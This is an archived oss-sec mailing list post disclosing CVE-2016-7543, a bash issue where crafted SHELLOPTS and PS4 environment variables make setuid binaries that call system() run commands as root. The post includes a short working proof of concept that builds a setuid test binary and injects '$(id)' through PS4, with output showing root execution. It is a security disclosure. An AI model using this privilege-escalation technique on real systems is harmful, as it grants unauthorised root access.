oss-sec mailing list archives

CVE-2016-7543 -- bash SHELLOPTS+PS4

From: up201407890 () alunos dcc fc up pt
Date: Mon, 26 Sep 2016 17:43:25 +0200

The recent bash 4.4 patched an old attack vector regarding
specially crafted SHELLOPTS+PS4 environment variables
against bogus setuid binaries using system()/popen().

https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html

"nn. Shells running as root no longer inherit PS4 from the environment,
closing a security hole involving PS4 expansion performing command
substitution."

# gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
# chmod 4755 ./test
# ls -l ./test
-rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test
# exit
$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root)
Sat Sep 10 18:06:36 WET 2016

Sorry Tavis :P

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Current thread:

CVE-2016-7543 -- bash SHELLOPTS+PS4 up201407890 (Sep 26)
- Re: CVE-2016-7543 -- bash SHELLOPTS+PS4 Tavis Ormandy (Sep 26)